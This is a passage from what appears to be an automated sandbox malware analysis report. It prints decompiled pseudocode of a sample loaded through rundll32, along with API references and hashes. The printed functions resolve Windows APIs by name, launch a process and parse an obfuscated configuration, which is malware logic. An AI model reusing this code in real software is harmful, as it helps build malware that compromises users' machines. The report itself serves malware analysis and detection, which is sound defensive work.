                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04FDAEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: c0bb653dea8c0cd8f137a92abafcb893ddb2991d92414a980db07410550398d8
                                          • Instruction ID: e930635f6a41b77e171c9a9508cfd1af9b5c5b943c69bf6e348ab9d7daceafc2
                                          • Opcode Fuzzy Hash: c0bb653dea8c0cd8f137a92abafcb893ddb2991d92414a980db07410550398d8
                                          • Instruction Fuzzy Hash: 02814DB1E01209AFDB15CFA9D884AADB7F6FF48314F188129E915E7340EB74E906CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD30FC, Relevance: 15.1, APIs: 10, Instructions: 102stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 56%
                                          			E04FD30FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0x4fdd33c; // 0x7529bb0
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E04FD9810(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0x4fdc19c;
				}
				_t44 = E04FD47E1(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E04FD58BE(lstrlenW(0x4fdeb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x4fdeb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0x4fdd2a4; // 0x254a5a8
						_t73 =  *0x4fdd11c; // 0x4fdabc9
						_t18 = _t75 + 0x4fdeb38; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E04FD58BE(lstrlenW(0x4fdec58) + _a8 + _t57 + _t58 + lstrlenW(0x4fdec58) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E04FD147E(_v16);
						} else {
							_t64 =  *0x4fdd2a4; // 0x254a5a8
							_t31 = _t64 + 0x4fdec58; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E04FD147E(_v8);
				}
				return _v20;
			}


























                                          0x04fd30fc
                                          0x04fd3104
                                          0x04fd310a
                                          0x04fd311a
                                          0x04fd311d
                                          0x04fd3122
                                          0x04fd3127
                                          0x04fd3129
                                          0x04fd3129
                                          0x04fd3132
                                          0x04fd3137
                                          0x04fd313c
                                          0x04fd3142
                                          0x04fd314c
                                          0x04fd3155
                                          0x04fd315c
                                          0x04fd316a
                                          0x04fd317c
                                          0x04fd3181
                                          0x04fd3186
                                          0x04fd318f
                                          0x04fd3198
                                          0x04fd31a1
                                          0x04fd31af
                                          0x04fd31b7
                                          0x04fd31bc
                                          0x04fd31bf
                                          0x04fd31ca
                                          0x04fd31e1
                                          0x04fd31e5
                                          0x04fd3218
                                          0x04fd31e7
                                          0x04fd31ea
                                          0x04fd31f2
                                          0x04fd31fd
                                          0x04fd3205
                                          0x04fd320d
                                          0x04fd3211
                                          0x04fd3211
                                          0x04fd31e5
                                          0x04fd3220
                                          0x04fd3225
                                          0x04fd322c

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04FD3111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 04FD314C
                                          • lstrlen.KERNEL32(?), ref: 04FD3155
                                          • lstrlen.KERNEL32(00000000), ref: 04FD315C
                                          • lstrlenW.KERNEL32(80000002), ref: 04FD316A
                                          • lstrlenW.KERNEL32(04FDEB38), ref: 04FD3173
                                          • lstrlen.KERNEL32(?), ref: 04FD31B7
                                          • lstrlen.KERNEL32(?), ref: 04FD31BF
                                          • lstrlenW.KERNEL32(?), ref: 04FD31CA
                                          • lstrlenW.KERNEL32(04FDEC58), ref: 04FD31D3
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: 055bccae9be28fa4538cf063cfa76ac37eb53a9cfe8c773653247ffa94f0e408
                                          • Instruction ID: d8e6f1f88e228fd5a6d4ff6a354a8caf30cd28030f5751963ceeecb8d7917d3d
                                          • Opcode Fuzzy Hash: 055bccae9be28fa4538cf063cfa76ac37eb53a9cfe8c773653247ffa94f0e408
                                          • Instruction Fuzzy Hash: 65314C76D0020DEFDF11AFA4DC4489E7FB6EF48348B198065E904A7211DB35EA16DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD1493, Relevance: 12.1, APIs: 8, Instructions: 110librarymemoryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E04FD1493(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t57;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;

				_t1 = __eax + 0x14; // 0x74183966
				_t67 =  *_t1;
				_t36 = E04FD57D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
				_t39 = _v12(_v12);
				_v8 = _t39;
				if(_t39 == 0 && ( *0x4fdd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t46 =  *0x4fdd2a4; // 0x254a5a8
					_t18 = _t46 + 0x4fde3e6; // 0x73797325
					_t66 = E04FD77E6(_t18);
					if(_t66 == 0) {
						_v8 = 8;
					} else {
						_t49 =  *0x4fdd2a4; // 0x254a5a8
						_t19 = _t49 + 0x4fde747; // 0x7528cef
						_t20 = _t49 + 0x4fde0af; // 0x4e52454b
						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t69 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04FD684E();
							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E04FD684E();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4fdd238, 0, _t66);
					}
				}
				_t68 = _v16;
				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
				E04FD147E(_t68);
				goto L12;
			}



















                                          0x04fd149b
                                          0x04fd149b
                                          0x04fd14aa
                                          0x04fd14b1
                                          0x04fd14b6
                                          0x04fd15c6
                                          0x04fd15cd
                                          0x04fd15cd
                                          0x04fd14c5
                                          0x04fd14d0
                                          0x04fd14d3
                                          0x04fd14d8
                                          0x04fd14ed
                                          0x04fd14f3
                                          0x04fd14f4
                                          0x04fd14f7
                                          0x04fd14fd
                                          0x04fd1500
                                          0x04fd1505
                                          0x04fd150d
                                          0x04fd1519
                                          0x04fd151d
                                          0x04fd15ad
                                          0x04fd1523
                                          0x04fd1523
                                          0x04fd1528
                                          0x04fd152f
                                          0x04fd1543
                                          0x04fd1547
                                          0x04fd1596
                                          0x04fd1549
                                          0x04fd154a
                                          0x04fd1551
                                          0x04fd156a
                                          0x04fd156c
                                          0x04fd1570
                                          0x04fd1577
                                          0x04fd1591
                                          0x04fd1579
                                          0x04fd1582
                                          0x04fd1587
                                          0x04fd1587
                                          0x04fd1577
                                          0x04fd15a5
                                          0x04fd15a5
                                          0x04fd151d
                                          0x04fd15b4
                                          0x04fd15bd
                                          0x04fd15c1
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04FD57D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04FD14AF,?,?,?,?,00000000,00000000), ref: 04FD57FD
                                            • Part of subcall function 04FD57D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04FD581F
                                            • Part of subcall function 04FD57D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04FD5835
                                            • Part of subcall function 04FD57D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04FD584B
                                            • Part of subcall function 04FD57D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04FD5861
                                            • Part of subcall function 04FD57D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04FD5877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 04FD14C5
                                          • memset.NTDLL ref: 04FD1500
                                            • Part of subcall function 04FD77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,04FD333A,73797325), ref: 04FD77F7
                                            • Part of subcall function 04FD77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04FD7811
                                          • GetModuleHandleA.KERNEL32(4E52454B,07528CEF,73797325), ref: 04FD1536
                                          • GetProcAddress.KERNEL32(00000000), ref: 04FD153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04FD15A5
                                            • Part of subcall function 04FD684E: GetProcAddress.KERNEL32(36776F57,04FD935F), ref: 04FD6869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04FD1582
                                          • CloseHandle.KERNEL32(?), ref: 04FD1587
                                          • GetLastError.KERNEL32(00000001), ref: 04FD158B
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: 7bad90556eef33142061ee3c7cb57ce77857d7625a3144a039e1aa1ba602daa8
                                          • Instruction ID: 5b1d2cc99e0cba5448b418b387f216488c892beb0fa6598ee9f7206ad5a98779
                                          • Opcode Fuzzy Hash: 7bad90556eef33142061ee3c7cb57ce77857d7625a3144a039e1aa1ba602daa8
                                          • Instruction Fuzzy Hash: C1313472D00208EFDB11AFA4DD88E9EBBBEEF04344F144565E606E7111D735AD45DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD4D2C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E04FD4D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4fdd2a4; // 0x254a5a8
				_t1 = _t9 + 0x4fde62c; // 0x253d7325
				_t36 = 0;
				_t28 = E04FD6027(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E04FD58BE(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04FD6F33(_t34, _t41, _a8);
						E04FD147E(_t41);
						_t42 = E04FD4759(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04FD147E(_t36);
							_t36 = _t42;
						}
						_t43 = E04FD4858(_t36, _t33);
						if(_t43 != 0) {
							E04FD147E(_t36);
							_t36 = _t43;
						}
					}
					E04FD147E(_t28);
				}
				return _t36;
			}














                                          0x04fd4d2c
                                          0x04fd4d2f
                                          0x04fd4d30
                                          0x04fd4d38
                                          0x04fd4d3f
                                          0x04fd4d46
                                          0x04fd4d4a
                                          0x04fd4d50
                                          0x04fd4d57
                                          0x04fd4d5c
                                          0x04fd4d6e
                                          0x04fd4d72
                                          0x04fd4d76
                                          0x04fd4d7c
                                          0x04fd4d81
                                          0x04fd4d91
                                          0x04fd4d93
                                          0x04fd4daa
                                          0x04fd4dae
                                          0x04fd4db1
                                          0x04fd4db6
                                          0x04fd4db6
                                          0x04fd4dbf
                                          0x04fd4dc3
                                          0x04fd4dc6
                                          0x04fd4dcb
                                          0x04fd4dcb
                                          0x04fd4dc3
                                          0x04fd4dce
                                          0x04fd4dce
                                          0x04fd4dd9

                                          APIs
                                            • Part of subcall function 04FD6027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04FD4D46,253D7325,00000000,00000000,74ECC740,?,?,04FD52FE,?), ref: 04FD608E
                                            • Part of subcall function 04FD6027: sprintf.NTDLL ref: 04FD60AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04FD52FE,?,075295B0), ref: 04FD4D57
                                          • lstrlen.KERNEL32(?,?,?,04FD52FE,?,075295B0), ref: 04FD4D5F
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • strcpy.NTDLL ref: 04FD4D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 04FD4D81
                                            • Part of subcall function 04FD6F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04FD4D90,00000000,?,?,?,04FD52FE,?,075295B0), ref: 04FD6F4A
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04FD52FE,?,075295B0), ref: 04FD4D9E
                                            • Part of subcall function 04FD4759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04FD4DAA,00000000,?,?,04FD52FE,?,075295B0), ref: 04FD4763
                                            • Part of subcall function 04FD4759: _snprintf.NTDLL ref: 04FD47C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 8042e3eea16833fd4b01377308a3ee890919ccabcb172b2c8920cbb7c734ff89
                                          • Instruction ID: 014e295656df6f565b074ca2a37844d7804a9a680a1f2b0ee3e4bcb54bd01e4e
                                          • Opcode Fuzzy Hash: 8042e3eea16833fd4b01377308a3ee890919ccabcb172b2c8920cbb7c734ff89
                                          • Instruction Fuzzy Hash: E8117373A0166977A7127BB59D44C6F3AAFDE4A65830D0115F505AB100DE34ED0397E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD98F7, Relevance: 9.2, APIs: 6, Instructions: 187memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E04FD98F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				signed int _t18;
				signed int _t23;
				void* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t41;
				void* _t43;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t54;
				signed int _t58;
				signed int _t62;
				signed int _t66;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t80 = __edi;
				_t72 = __ecx;
				_t69 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x4fdd2a0; // 0x59935a40
				if(E04FD96D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
					 *0x4fdd2d0 = _v12;
				}
				_t23 =  *0x4fdd2a0; // 0x59935a40
				if(E04FD96D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
					_t28 = 2;
					return _t28;
				} else {
					_push(_t69);
					_t70 = _v12;
					_push(_t83);
					_push(_t80);
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t66 =  *0x4fdd2a0; // 0x59935a40
						_t29 = E04FD10CA(_t72, _t70, _t66 ^ 0x48b4463f);
					}
					if(_t29 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0x4fdd240 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t62 =  *0x4fdd2a0; // 0x59935a40
						_t30 = E04FD10CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
					}
					if(_t30 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0x4fdd244 = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t58 =  *0x4fdd2a0; // 0x59935a40
						_t31 = E04FD10CA(_t72, _t70, _t58 ^ 0x01dd0365);
					}
					if(_t31 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x4fdd248 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t54 =  *0x4fdd2a0; // 0x59935a40
						_t32 = E04FD10CA(_t72, _t70, _t54 ^ 0x3cf823ca);
					}
					if(_t32 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x4fdd004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t50 =  *0x4fdd2a0; // 0x59935a40
						_t33 = E04FD10CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
					}
					if(_t33 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x4fdd02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t46 =  *0x4fdd2a0; // 0x59935a40
						_t34 = E04FD10CA(_t72, _t70, _t46 ^ 0x163b337e);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t43 = 0x10;
						_t44 = E04FDA2EF(_t43);
						if(_t44 != 0) {
							_push(_t44);
							E04FD9B10();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t41 =  *0x4fdd2a0; // 0x59935a40
						_t35 = E04FD10CA(_t72, _t70, _t41 ^ 0x89f501b6);
					}
					if(_t35 != 0 && E04FDA2EF(0, _t35) != 0) {
						_t86 =  *0x4fdd324; // 0x75295b0
						E04FD4C3A(_t86 + 4, _t39);
					}
					HeapFree( *0x4fdd238, 0, _t70);
					return 0;
				}
			}





























                                          0x04fd98f7
                                          0x04fd98f7
                                          0x04fd98f7
                                          0x04fd98f7
                                          0x04fd98fa
                                          0x04fd98fb
                                          0x04fd98fc
                                          0x04fd9916
                                          0x04fd9924
                                          0x04fd9924
                                          0x04fd9929
                                          0x04fd9943
                                          0x04fd9ad2
                                          0x04fd9ad4
                                          0x04fd9949
                                          0x04fd9949
                                          0x04fd994a
                                          0x04fd994d
                                          0x04fd994e
                                          0x04fd9953
                                          0x04fd9969
                                          0x04fd9955
                                          0x04fd9955
                                          0x04fd9962
                                          0x04fd9962
                                          0x04fd9973
                                          0x04fd9975
                                          0x04fd997f
                                          0x04fd9984
                                          0x04fd9984
                                          0x04fd997f
                                          0x04fd998b
                                          0x04fd99a1
                                          0x04fd998d
                                          0x04fd998d
                                          0x04fd999a
                                          0x04fd999a
                                          0x04fd99a5
                                          0x04fd99a7
                                          0x04fd99b1
                                          0x04fd99b6
                                          0x04fd99b6
                                          0x04fd99b1
                                          0x04fd99bd
                                          0x04fd99d3
                                          0x04fd99bf
                                          0x04fd99bf
                                          0x04fd99cc
                                          0x04fd99cc
                                          0x04fd99d7
                                          0x04fd99d9
                                          0x04fd99e3
                                          0x04fd99e8
                                          0x04fd99e8
                                          0x04fd99e3
                                          0x04fd99ef
                                          0x04fd9a05
                                          0x04fd99f1
                                          0x04fd99f1
                                          0x04fd99fe
                                          0x04fd99fe
                                          0x04fd9a09
                                          0x04fd9a0b
                                          0x04fd9a15
                                          0x04fd9a1a
                                          0x04fd9a1a
                                          0x04fd9a15
                                          0x04fd9a21
                                          0x04fd9a37
                                          0x04fd9a23
                                          0x04fd9a23
                                          0x04fd9a30
                                          0x04fd9a30
                                          0x04fd9a3b
                                          0x04fd9a3d
                                          0x04fd9a47
                                          0x04fd9a4c
                                          0x04fd9a4c
                                          0x04fd9a47
                                          0x04fd9a53
                                          0x04fd9a69
                                          0x04fd9a55
                                          0x04fd9a55
                                          0x04fd9a62
                                          0x04fd9a62
                                          0x04fd9a6d
                                          0x04fd9a6f
                                          0x04fd9a72
                                          0x04fd9a73
                                          0x04fd9a7a
                                          0x04fd9a7c
                                          0x04fd9a7d
                                          0x04fd9a7d
                                          0x04fd9a7a
                                          0x04fd9a84
                                          0x04fd9a9a
                                          0x04fd9a86
                                          0x04fd9a86
                                          0x04fd9a93
                                          0x04fd9a93
                                          0x04fd9a9e
                                          0x04fd9aac
                                          0x04fd9ab6
                                          0x04fd9ab6
                                          0x04fd9ac3
                                          0x04fd9acf
                                          0x04fd9acf

                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04FD4A8B), ref: 04FD997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04FD4A8B), ref: 04FD99AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04FD4A8B), ref: 04FD99DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04FD4A8B), ref: 04FD9A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04FD4A8B), ref: 04FD9A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,04FDD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04FD4A8B), ref: 04FD9AC3
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 1d1281d44aeace05af6cc7d0195cf7ca3050319fbc7b1bc86729383daf75f47c
                                          • Instruction ID: 4ce3a353da5116dcaf8dd73b1dc3d3e7f1d2f1e75fd8bf72ba2bfdadd225fab4
                                          • Opcode Fuzzy Hash: 1d1281d44aeace05af6cc7d0195cf7ca3050319fbc7b1bc86729383daf75f47c
                                          • Instruction Fuzzy Hash: 995162B2B01158EEE710EBF9EE88D5F76EFEB8870476C0915A501D7108F6B5FD428621
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD135B, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 04FD13B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 04FD13C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 04FD13DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD1443
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD1452
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD145D
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: cd92ef815e5a014f8353f31e831fab6cd4a427c1c8679a13ce312851a65d200b
                                          • Instruction ID: c8b9ca0b9cd2d59970f6e95ebd8e5b346c7398181277c6ee54229701f5208c4f
                                          • Opcode Fuzzy Hash: cd92ef815e5a014f8353f31e831fab6cd4a427c1c8679a13ce312851a65d200b
                                          • Instruction Fuzzy Hash: C4414E36D00609AFDB01EFF8D944A9FB7BAEF8A301F144425E914EB110DA75ED06CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD57D8, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04FD57D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04FD58BE(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4fdd2a4; // 0x254a5a8
					_t1 = _t23 + 0x4fde11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4fdd2a4; // 0x254a5a8
					_t2 = _t26 + 0x4fde769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04FD147E(_t54);
					} else {
						_t30 =  *0x4fdd2a4; // 0x254a5a8
